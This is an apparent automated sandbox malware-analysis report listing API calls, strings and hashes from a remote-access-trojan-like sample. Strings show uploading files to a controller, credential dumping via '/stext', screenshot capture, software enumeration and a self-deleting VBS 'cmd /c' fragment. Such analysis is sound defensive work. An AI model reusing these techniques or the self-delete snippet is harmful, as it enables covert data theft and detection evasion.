APIs

GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414DD5
LoadLibraryA.KERNEL32(?), ref: 00414E17
GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E37
FreeLibrary.KERNEL32(00000000), ref: 00414E3E
LoadLibraryA.KERNEL32(?), ref: 00414E76
GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E88
FreeLibrary.KERNEL32(00000000), ref: 00414E8F
GetProcAddress.KERNEL32(00000000,?), ref: 00414E9E
FreeLibrary.KERNEL32(00000000), ref: 00414EB5

Strings

getnameinfo, xrefs: 00414DA2
getaddrinfo, xrefs: 00414D93, 00414E31, 00414E82
\wship6, xrefs: 00414E5E
freeaddrinfo, xrefs: 00414DB2
IA, xrefs: 00414EDD
\ws2_32, xrefs: 00414DFF

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: Library$AddressFreeProc$Load$DirectorySystem
String ID: IA$\ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
API String ID: 2490988753-1941338355
Opcode ID: 5f1d90fefb9d3b4d80abd47ac0ceceaf8be97214d3ee7f7b1d429d579a686c66
Instruction ID: d7a8240acd80c680e6a706eb94e62412fcb65bdb905c2e3468e0ccb64a1f64dc
Opcode Fuzzy Hash: 5f1d90fefb9d3b4d80abd47ac0ceceaf8be97214d3ee7f7b1d429d579a686c66
Instruction Fuzzy Hash: 8C31D5B1902315A7C320EF65DC84EDBB7D8AF84744F004A2AF94893250D778DD858BEE

Function 0044F42D Relevance: 25.9, APIs: 17, Instructions: 419COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0044F4BF
_free.LIBCMT ref: 0044F4E5
_free.LIBCMT ref: 0044F50E
_free.LIBCMT ref: 0044F546
_free.LIBCMT ref: 0044F577
_free.LIBCMT ref: 0044F5B8
SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 0044F639
_free.LIBCMT ref: 0044F652
_wcschr.LIBVCRUNTIME ref: 0044F68F
_free.LIBCMT ref: 0044F6FB
_free.LIBCMT ref: 0044F721
_free.LIBCMT ref: 0044F74A
_free.LIBCMT ref: 0044F77F
_free.LIBCMT ref: 0044F7B0
_free.LIBCMT ref: 0044F7F1
SetEnvironmentVariableW.KERNEL32(00000000,?,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F876
_free.LIBCMT ref: 0044F88F

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: _free$EnvironmentVariable$_wcschr
String ID:
API String ID: 3899193279-0
Opcode ID: 12b2d8700cfafab1c51f31b0af1c60b5a90c67e430b3d12670f3d9796c815c4a
Instruction ID: f75d98bba309171a1893162bbba9979c566f834f65d54a181aa040c21db392b6
Opcode Fuzzy Hash: 12b2d8700cfafab1c51f31b0af1c60b5a90c67e430b3d12670f3d9796c815c4a
Instruction Fuzzy Hash: C4D13672D007006BFB20AF799D81A6B77A4EF01318F05427FE919A7382EB3D99058799

Function 00412AB4 Relevance: 25.0, APIs: 9, Strings: 5, Instructions: 482sleepfileCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412ACD

Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041B99F

Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E74), ref: 0041857E
Part of subcall function 00418568: CloseHandle.KERNEL32(t^F,?,?,004040F5,00465E74), ref: 00418587

Sleep.KERNEL32(0000000A,00465E74), ref: 00412C1F
Sleep.KERNEL32(0000000A,00465E74,00465E74), ref: 00412CC1
Sleep.KERNEL32(0000000A,00465E74,00465E74,00465E74), ref: 00412D63
DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DC5
DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DFC
DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412E38
Sleep.KERNEL32(000001F4,00465E74,00465E74,00465E74), ref: 00412E52
Sleep.KERNEL32(00000064), ref: 00412E94

Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36

Strings

/stext ", xrefs: 00412BAA, 00412C4C, 00412CEE
0TG, xrefs: 0041314C
NG, xrefs: 00412F6C
NG, xrefs: 004130C1
0TG, xrefs: 00413026

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
String ID: /stext "$0TG$0TG$NG$NG
API String ID: 1223786279-2576077980
Opcode ID: 32d90d55cb05bb5b069b036a4d337625a659ecb65ee468f1972c10dd974b4365
Instruction ID: 3b0169c2c8bc9f0d695cedb60fdc7b81a1931596247e975dd6f1dc47d42db627
Opcode Fuzzy Hash: 32d90d55cb05bb5b069b036a4d337625a659ecb65ee468f1972c10dd974b4365
Instruction Fuzzy Hash: 990255311083418AC325FB62D851AEFB3E5AFD4348F50483EF58A971E2EF785A49C65A

Function 0041C68F Relevance: 23.0, APIs: 6, Strings: 7, Instructions: 214registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C6B1
RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041C6F5
RegCloseKey.ADVAPI32(?), ref: 0041C9BF

Strings

Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 0041C6A7
Publisher, xrefs: 0041C751
UninstallString, xrefs: 0041C7A4
DisplayName, xrefs: 0041C73C
InstallLocation, xrefs: 0041C77C
DisplayVersion, xrefs: 0041C768
InstallDate, xrefs: 0041C790

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
API String ID: 1332880857-3714951968
Opcode ID: 131f557390299a5fb98f0b65c13fdfd9cb57ca643134b75c275777f897c8710a
Instruction ID: af0903b0dab8fbea49832074ad132f154b97281cd99b968e1e8b6bf9777b958e
Opcode Fuzzy Hash: 131f557390299a5fb98f0b65c13fdfd9cb57ca643134b75c275777f897c8710a
Instruction Fuzzy Hash: 248144711083419BC325EF11D851EEFB7E8BF94309F10492FB589921A1FF78AE49CA5A

Function 0041D58F Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 74windowCOMMON

Download Yara Rule

APIs

DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D5DA
GetCursorPos.USER32(?), ref: 0041D5E9
SetForegroundWindow.USER32(?), ref: 0041D5F2
TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D60C
Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D65D
ExitProcess.KERNEL32 ref: 0041D665
CreatePopupMenu.USER32 ref: 0041D66B
AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D680

Strings

Close, xrefs: 0041D671

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
String ID: Close
API String ID: 1657328048-3535843008
Opcode ID: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
Instruction ID: 483e3be36cf21f9f431d69439bfbb75804d706e25d1e382f075e68ac53faeb55
Opcode Fuzzy Hash: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
Instruction Fuzzy Hash: 392127B1944208FFDB194FA4ED0EAAA3B65FB08342F000135FA0A950B1D775EDA1EB5D

Function 00445D56 Relevance: 22.8, APIs: 15, Instructions: 296COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00445DC6
_free.LIBCMT ref: 00445DDC
_free.LIBCMT ref: 00445DED
_free.LIBCMT ref: 00445DFE
_free.LIBCMT ref: 00445E15
GetCPInfo.KERNEL32(?,?), ref: 00445E5D

Part of subcall function 00452E74: _free.LIBCMT ref: 00452EDF

_free.LIBCMT ref: 00446009
_free.LIBCMT ref: 0044601C
_free.LIBCMT ref: 0044602A
_free.LIBCMT ref: 00446035
_free.LIBCMT ref: 00446077
_free.LIBCMT ref: 0044607F
_free.LIBCMT ref: 00446087
_free.LIBCMT ref: 0044608F
_free.LIBCMT ref: 0044609D

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: 5c7b1bf4f475568e38e69d940d0222fa4f9c7dd3754b5f784b0771feacd0cc66
Instruction ID: 88ee944febda996c7adaaf7605242af7944d99fb061a5fd2e4f26fad8993db39
Opcode Fuzzy Hash: 5c7b1bf4f475568e38e69d940d0222fa4f9c7dd3754b5f784b0771feacd0cc66
Instruction Fuzzy Hash: 75B1CD719006059FEF20DF69C881BEEBBB4FF09304F14412EF5A8A7242D6799D45CB65

Function 00408B7A Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 328fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00408CE3
GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D1B
__aulldiv.LIBCMT ref: 00408D4D

Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36

Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509

SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408E70
ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408E8B
CloseHandle.KERNEL32(00000000), ref: 00408F64
CloseHandle.KERNEL32(00000000,00000052), ref: 00408FAE
CloseHandle.KERNEL32(00000000), ref: 00408FFC

Strings

NG, xrefs: 00408C17
SetFilePointerEx error, xrefs: 00408FD4
Uploading file to Controller: , xrefs: 00408DD5
ReadFile error, xrefs: 00408FC8

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $NG
API String ID: 3086580692-2582957567
Opcode ID: 63a76c325e571f1cbcae1b5be894793c9b49cb204c16b04160e7bd094f2be9c7
Instruction ID: 4fd1ef8f0950b8c70c5ee12d710945c0a569e6ad21e20d2a74dcf75f3ec9a52d
Opcode Fuzzy Hash: 63a76c325e571f1cbcae1b5be894793c9b49cb204c16b04160e7bd094f2be9c7
Instruction Fuzzy Hash: 95B193716083409BC314FB25C982AAFB7E5AFC4354F50492FF589622D2EF789945CB8B

Function 0040A726 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 163sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00001388), ref: 0040A740

Part of subcall function 0040A675: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A74D), ref: 0040A6AB
Part of subcall function 0040A675: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
Part of subcall function 0040A675: Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
Part of subcall function 0040A675: CloseHandle.KERNEL32(00000000,?,?,?,0040A74D), ref: 0040A6EE

CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A77C
GetFileAttributesW.KERNEL32(00000000), ref: 0040A78D
SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7A4
PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 0040A81E

Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C49E

SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466468,00000000,00000000,00000000), ref: 0040A927

Strings

PG, xrefs: 0040A907
pQG, xrefs: 0040A771
8SG, xrefs: 0040A7F7
pQG, xrefs: 0040A761
PG, xrefs: 0040A7AC
8SG, xrefs: 0040A802

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
String ID: 8SG$8SG$pQG$pQG$PG$PG
API String ID: 3795512280-1152054767
Opcode ID: f9bf0f70ca639f6d962135a3ade2805c3c6b71e3802994e37fdf4666e5df7246
Instruction ID: 265ddfea45d140738b9a7e0f0353a6f5be26653907181caffe3561bb72ed66c0
Opcode Fuzzy Hash: f9bf0f70ca639f6d962135a3ade2805c3c6b71e3802994e37fdf4666e5df7246
Instruction Fuzzy Hash: A7517E716043055ACB09BB32C866ABE739A9F80349F00483FB642B71E2DF7C9D09865E

Function 004048C8 Relevance: 21.1, APIs: 4, Strings: 8, Instructions: 144networkCOMMON

Download Yara Rule

APIs

connect.WS2_32(?,?,?), ref: 004048E0
CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
WSAGetLastError.WS2_32 ref: 00404A21

Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509

Strings

TLS Error 2, xrefs: 00404955
TLS Handshake... | , xrefs: 00404904
Connection Failed: , xrefs: 00404A43
TLS Error 3, xrefs: 004049D8
Connection Refused, xrefs: 00404A76
PkGNG, xrefs: 004048C8
TLS Authentication Failed, xrefs: 00404999
TLS Error 1, xrefs: 00404937

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: CreateEvent$ErrorLastLocalTimeconnect
String ID: Connection Failed: $Connection Refused$PkGNG$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
API String ID: 994465650-3229884001
Opcode ID: 544a8dfd755885537e58458bfc18e92728dddd0fb449b18b6c8fe8c32441fe06
Instruction ID: c5d57dbf39bf42eeb7f1fe8451fa1a1ddda5cb55b73798f96fdafd5064c5310c
Opcode Fuzzy Hash: 544a8dfd755885537e58458bfc18e92728dddd0fb449b18b6c8fe8c32441fe06
Instruction Fuzzy Hash: 3E41E8B47406016BD61877BA8D1B53E7A15AB81304B50017FE60267AD3EB7D9C108BDF

Function 004512C6 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0045130A

Part of subcall function 00450502: _free.LIBCMT ref: 0045051F
Part of subcall function 00450502: _free.LIBCMT ref: 00450531
Part of subcall function 00450502: _free.LIBCMT ref: 00450543
Part of subcall function 00450502: _free.LIBCMT ref: 00450555
Part of subcall function 00450502: _free.LIBCMT ref: 00450567
Part of subcall function 00450502: _free.LIBCMT ref: 00450579
Part of subcall function 00450502: _free.LIBCMT ref: 0045058B
Part of subcall function 00450502: _free.LIBCMT ref: 0045059D
Part of subcall function 00450502: _free.LIBCMT ref: 004505AF
Part of subcall function 00450502: _free.LIBCMT ref: 004505C1
Part of subcall function 00450502: _free.LIBCMT ref: 004505D3
Part of subcall function 00450502: _free.LIBCMT ref: 004505E5
Part of subcall function 00450502: _free.LIBCMT ref: 004505F7

_free.LIBCMT ref: 004512FF

Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA

_free.LIBCMT ref: 00451321
_free.LIBCMT ref: 00451336
_free.LIBCMT ref: 00451341
_free.LIBCMT ref: 00451363
_free.LIBCMT ref: 00451376
_free.LIBCMT ref: 00451384
_free.LIBCMT ref: 0045138F
_free.LIBCMT ref: 004513C7
_free.LIBCMT ref: 004513CE
_free.LIBCMT ref: 004513EB
_free.LIBCMT ref: 00451403

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
Instruction ID: 673b37a441ff9bbb7eb6cd98574e5fa8379d72fae64c09c4febd1ea684bb8cd8
Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
Instruction Fuzzy Hash: 0E319E315007009FFB20AA7AD845B5B73E8EF0131AF50851FEC68D7662DF78AD448B59

Function 00419FB4 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 176sleeptimeCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00419FB9
GdiplusStartup.GDIPLUS(00474ACC,?,00000000), ref: 00419FEB
CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A077
Sleep.KERNEL32(000003E8), ref: 0041A0FD
GetLocalTime.KERNEL32(?), ref: 0041A105
Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A1F4

Strings

PG, xrefs: 0041A1AD
wnd_%04i%02i%02i_%02i%02i%02i, xrefs: 0041A09A, 0041A0BB, 0041A129
time_%04i%02i%02i_%02i%02i%02i, xrefs: 0041A09F
PG, xrefs: 0041A0C9
PG, xrefs: 0041A016

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i$PG$PG$PG
API String ID: 489098229-1431523004
Opcode ID: 794bb2b208bad590467bd00f6a6004f6f957c756b4e279e9b706f936551238fb
Instruction ID: 65e100c03f0dda0ba9a952c873ad8774fe275ee1deca45487f64c7c8a8292b0e
Opcode Fuzzy Hash: 794bb2b208bad590467bd00f6a6004f6f957c756b4e279e9b706f936551238fb
Instruction Fuzzy Hash: E7515D70A00215AACB14BBB5C8529ED7BA9AB44308F40403FF509AB1E2EF7C9D85C799

Function 0040D7FF Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 148COMMON

Download Yara Rule

APIs

Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,?,0040D80F), ref: 00412860
Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF,?,0040D80F), ref: 00412873

Part of subcall function 004136F8: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 00413714
Part of subcall function 004136F8: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 0041372D
Part of subcall function 004136F8: RegCloseKey.ADVAPI32(?), ref: 00413738

GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D859
ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D9B8
ExitProcess.KERNEL32 ref: 0040D9C4

Strings

8SG, xrefs: 0040D80F
.vbs, xrefs: 0040D85F
CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName), xrefs: 0040D967
""", 0, xrefs: 0040D8E1
CreateObject("WScript.Shell").Run "cmd /c "", xrefs: 0040D8F9
open, xrefs: 0040D9B2
exepath, xrefs: 0040D831
Temp, xrefs: 0040D89A

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
String ID: """, 0$.vbs$8SG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
API String ID: 1913171305-3159800282
Opcode ID: 8540ee6109fc5d5e06acd7d4b9875de3834636e3193428be82b889be829a6c91
Instruction ID: 6fc8d312854778a25908ca85050b1cee1951ef16e4956e50e312a563d71e527c
Opcode Fuzzy Hash: 8540ee6109fc5d5e06acd7d4b9875de3834636e3193428be82b889be829a6c91
Instruction Fuzzy Hash: 0C413A719001195ACB15FA62DC56DEEB778AF50309F10007FB10AB61E2EF785E4ACA98

Function 00450600 Relevance: 18.4, APIs: 12, Instructions: 376COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00450648
_free.LIBCMT ref: 0045066C
_free.LIBCMT ref: 00450679
_free.LIBCMT ref: 0045069E
_free.LIBCMT ref: 004506AB
_free.LIBCMT ref: 004506B4
_free.LIBCMT ref: 00450992
_free.LIBCMT ref: 0045099A

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 47079874d6611f76b22abc1c1892e8562d414d23f3395fd45a7677fdf32a9ec5
Instruction ID: d910990a8472ee08c0279d8077499983e41ff25138a9859a729e4309013b5263
Opcode Fuzzy Hash: 47079874d6611f76b22abc1c1892e8562d414d23f3395fd45a7677fdf32a9ec5
Instruction Fuzzy Hash: E2C17476D40204AFEB20DBA9CC83FDE77B8AB19705F14015AFE05EB283D6B49D458798

Function 00455BDB Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 004558A9: CreateFileW.KERNEL32(00000000,00000000,?,00455C84,?,?,00000000,?,00455C84,00000000,0000000C), ref: 004558C6

GetLastError.KERNEL32 ref: 00455CEF
__dosmaperr.LIBCMT ref: 00455CF6
GetFileType.KERNEL32(00000000), ref: 00455D02
GetLastError.KERNEL32 ref: 00455D0C
__dosmaperr.LIBCMT ref: 00455D15
CloseHandle.KERNEL32(00000000), ref: 00455D35
CloseHandle.KERNEL32(?), ref: 00455E7F
GetLastError.KERNEL32 ref: 00455EB1
__dosmaperr.LIBCMT ref: 00455EB8

Strings

H, xrefs: 00455E3D

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: ad10cc44415123364ccf3ab0f87a2b5b2deaae059395c87e8052164914e7d7f7
Instruction ID: f4290dc4267d91ba683862cdaabef3013db21248f4240db41616def06e578eae
Opcode Fuzzy Hash: ad10cc44415123364ccf3ab0f87a2b5b2deaae059395c87e8052164914e7d7f7
Instruction Fuzzy Hash: D5A155329106049FDF19AF68DC617BE3BA0EB06325F14415EEC11EB392CB398D5ACB59

Function 00453D83 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 268COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,0045405C,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00453E2F
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453EB2
__alloca_probe_16.LIBCMT ref: 00453EEA
MultiByteToWideChar.KERNEL32(00000001,00000001,?,00000001,00000000,\@E,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F45
__alloca_probe_16.LIBCMT ref: 00453F94
MultiByteToWideChar.KERNEL32(00000001,00000009,00000001,00000000,00000000,00000000,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F5C

Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169

MultiByteToWideChar.KERNEL32(00000001,00000001,00000001,00000000,00000000,?,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FD8
__freea.LIBCMT ref: 00454003
__freea.LIBCMT ref: 0045400F

Strings

\@E, xrefs: 00453F37, 00453DF1

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
String ID: \@E
API String ID: 201697637-1814623452
Opcode ID: 347d6d77569ccb8731e03be0652f4f39992ef0e8e93efb01081f6886d5a4a2b8
Instruction ID: bd5a1837779a5f2dcb5c2ea5aeb828518df7829aba760434011a70bbc407b236
Opcode Fuzzy Hash: 347d6d77569ccb8731e03be0652f4f39992ef0e8e93efb01081f6886d5a4a2b8
Instruction Fuzzy Hash: E391F472E002069ADB209E65CC42AEFBBF59F09756F14052BFC01E7282D739DD89C768

Function 0044AC49 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 216COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,$C,0043EA24,?,?,PkGNG,0044AE9A,00000001,00000001,73E85006), ref: 0044ACA3
__alloca_probe_16.LIBCMT ref: 0044ACDB
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,PkGNG,0044AE9A,00000001,00000001,73E85006,?,?,?), ref: 0044AD29
__alloca_probe_16.LIBCMT ref: 0044ADC0
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,73E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AE23
__freea.LIBCMT ref: 0044AE30

Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169

__freea.LIBCMT ref: 0044AE39
__freea.LIBCMT ref: 0044AE5E

Strings

PkGNG, xrefs: 0044AC4B
$C, xrefs: 0044AC5B

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
String ID: $C$PkGNG
API String ID: 3864826663-3740547665
Opcode ID: 362257cb831b64f560ca9c305cbafbf1ddd2a76c4c9bcde51592d12c0f33465e
Instruction ID: b5b01290aead076256688b5938d42e4b2a7c64905c3dece0b68445a47d4ef5f6
Opcode Fuzzy Hash: 362257cb831b64f560ca9c305cbafbf1ddd2a76c4c9bcde51592d12c0f33465e
Instruction Fuzzy Hash: 1F513A72680206AFFB258F64CC41EBF77AAEB44714F24462EFC14D6240EB38DC60875A

Function 00450A25 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 204COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00450A94
_free.LIBCMT ref: 00450AA2
_free.LIBCMT ref: 00450BD0
_free.LIBCMT ref: 00450BDB

Strings

`&G, xrefs: 00450C34
\&G, xrefs: 00450C1C
\&G, xrefs: 00450C24

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: _free
String ID: \&G$\&G$`&G
API String ID: 269201875-253610517
